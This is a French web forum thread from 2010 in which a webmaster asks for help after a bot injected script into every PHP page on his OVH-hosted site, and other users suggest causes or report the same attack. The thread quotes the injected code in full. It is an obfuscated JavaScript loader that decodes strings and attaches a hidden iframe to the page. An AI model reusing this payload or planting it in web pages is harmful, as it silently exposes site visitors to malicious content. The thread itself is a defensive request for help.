Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
2238 connectés 

  FORUM HardWare.fr
  Programmation
  PHP

  [PHP] Sécurité - Injection de javascripts

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

[PHP] Sécurité - Injection de javascripts

n°1965718
zeOffsprin​g
Posté le 13-02-2010 à 13:55:58  profilanswer
 

Bonjour à tous,
 
Après une rapide recherche dans le forum, je n'ai pas trouvé de sujet concernant ma question.
Je possède un site intégralement fait en PHP maison (pas de framework) et hébergé chez OVH.
 
Hier, je me suis rendu compte que toutes mes pages contenant une minuscule iframe ajoutée par un robot.
 
En voici le code :
 

Code :
  1. <body class="page"> <kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5><script>function KfaNOQGmkA(QTCvLAKt){return QTCvLAKt.split(new String()).reverse().join(new String());}function eKnkhTmkgvU(IudgMsRyLmBV,ZgSTmGXZfLDTL){var iGMoXZukcDgHKADzaK=null;if(IudgMsRyLmBV==iGMoXZukcDgHKADzaK||IudgMsRyLmBV.length<8){return;}if(ZgSTmGXZfLDTL==iGMoXZukcDgHKADzaK||ZgSTmGXZfLDTL.length<=0){return;}var pEChMvpqCk="";for(var NrQWIkTLnvVkoac=0;NrQWIkTLnvVkoac<ZgSTmGXZfLDTL.length;NrQWIkTLnvVkoac++){pEChMvpqCk+=ZgSTmGXZfLDTL.charCodeAt(NrQWIkTLnvVkoac).toString();}var OttbmSmsBBm=Math.floor(pEChMvpqCk.length/5);var OoNEppSPr=parseInt(pEChMvpqCk.charAt(OttbmSmsBBm)+pEChMvpqCk.charAt(OttbmSmsBBm*2)+pEChMvpqCk.charAt(OttbmSmsBBm*3)+pEChMvpqCk.charAt(OttbmSmsBBm*4)+pEChMvpqCk.charAt(OttbmSmsBBm*5));var LosqKCWWCCdEfIseA=Math.round(ZgSTmGXZfLDTL.length/2);var zWlAUxwUohnqOb=Math.pow(2,31)-1;var wknzvpwvpTcPTTiqEu=parseInt(IudgMsRyLmBV.substring(IudgMsRyLmBV.length-8,IudgMsRyLmBV.length),16);IudgMsRyLmBV=IudgMsRyLmBV.substring(0,IudgMsRyLmBV.length-8);pEChMvpqCk+=wknzvpwvpTcPTTiqEu;while(pEChMvpqCk.length>10){pEChMvpqCk=(parseInt(pEChMvpqCk.substring(0,10))+parseInt(pEChMvpqCk.substring(10,pEChMvpqCk.length))).toString();}pEChMvpqCk=(OoNEppSPr*pEChMvpqCk+LosqKCWWCCdEfIseA)%zWlAUxwUohnqOb;var yntCTBVqZw="";var LkieMTDEOBiMRL="";for(var TryGsmbCpqOQpAOpU=0;TryGsmbCpqOQpAOpU<IudgMsRyLmBV.length;TryGsmbCpqOQpAOpU+=2){yntCTBVqZw=parseInt(parseInt(IudgMsRyLmBV.substring(TryGsmbCpqOQpAOpU,TryGsmbCpqOQpAOpU+2),16)^Math.floor((pEChMvpqCk/zWlAUxwUohnqOb)*255));LkieMTDEOBiMRL+=String.fromCharCode(yntCTBVqZw);pEChMvpqCk=(OoNEppSPr*pEChMvpqCk+LosqKCWWCCdEfIseA)%zWlAUxwUohnqOb;}return LkieMTDEOBiMRL;}IMWuTSHx=document.createElement(KfaNOQGmkA(eKnkhTmkgvU("de454495031205c856a9","wqcARdoRoGydGd" )));IMWuTSHx.setAttribute(KfaNOQGmkA(eKnkhTmkgvU("c8e89502583f47","tEuTceTymPZAyxXS" )),KfaNOQGmkA(eKnkhTmkgvU("34320ab0092a189dc8dba31f1740295669e13e36fd1e480d26450446f67dab6af889698b9949bac36cf615746779f43f5504707545","rRcsMgumrfXLv" )));IMWuTSHx.style.width=KfaNOQGmkA(eKnkhTmkgvU("7f820700ccbd9c","nJHPolvVHcGWFcKBdB" ));IMWuTSHx.style.height=KfaNOQGmkA(eKnkhTmkgvU("45cf0502043b45","oASopzGIEDzRmm" ));document.body.appendChild(IMWuTSHx);</script></kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5>


 
Un truc moche, pas très lisible à l'oeil nu et ce bout de code a été inséré sur toute mes pages php contenant une balise body.
L'insertion se fait juste après la balide ouvrante.
 
Ce qui me chagrine vraiment, c'est qu'en passant par Filezilla, je me suis rendu compte que l'intégralité de mon arborescence a été
visitée et que tous les fichiers php/php5 ont été ouverts en écriture.... (j'ai pu les écraser avec les bonnes versions mais bon...)
 
Est-ce que quelqu'un a déjà subi ce type d'attaque ?
Est-ce que quelqu'un a une idée du type de faille sur laquelle le robot a pu travailler (que je corrige) ?
 
Merci d'avance pour vos retours !
 
Seb


---------------
Webmaster http://www.theoffspringsession.com
mood
Publicité
Posté le 13-02-2010 à 13:55:58  profilanswer
 

n°1965735
d@kn1ko
Posté le 13-02-2010 à 15:34:51  profilanswer
 

t as utilisé les fonctions style htmlspecialchar(); htmlentities(); ?
 
droit sur tes fichiers?

n°1965738
zeOffsprin​g
Posté le 13-02-2010 à 15:49:06  profilanswer
 

d@kn1ko a écrit :

t as utilisé les fonctions style htmlspecialchar(); htmlentities(); ?
 
droit sur tes fichiers?


 
tous mes scripts sont en 644
j'ai oublié de préciser que mon fichiers robots.txt (attributs 444) est souvent modifié aussi :(
 
pour toute insertion en base, j'utilise effectivement ceci :
htmlentities(addslashes($p_value))


Message édité par zeOffspring le 13-02-2010 à 15:49:35

---------------
Webmaster http://www.theoffspringsession.com
n°1965764
aideinfo
Posté le 13-02-2010 à 18:15:57  profilanswer
 

Tout à l'heure, j'ai vu le même pb sur mon compte OVH. Insertion d'un code dans les index.php/html et les .js. Pourtant, je ne l'utilise pas !!! Il y avait juste Eskuel (que j'ai viré) et 2/3 fichiers affichant juste les valeurs de variables PHP, le phpinfo ou des trucs du genre.


---------------
http://www.aideinfo.com/  Whois adresses IP/domaines le plus évolué !!  FAQ Free Mobile

Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  PHP

  [PHP] Sécurité - Injection de javascripts

 

Sujets relatifs
PHP dans formulaire et $_POST je dois cliquer deux fois ...[PHP/MYSQL] Definir un debut de journée.
SécuritéProblème pour afficher une image en PHP
Besoin d'aide en PHPTerme pour appli type Java vs. PHP?
récupérer les variables PHP dans un symbole flash (AS 2)Comment creer facilement un graphique en PHP ?
[PHP] Stokage authentification internet explorer[PHP] Trouver le sha1 d'un .pkcs12, depuis une forme binaire.
Plus de sujets relatifs à : [PHP] Sécurité - Injection de javascripts


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR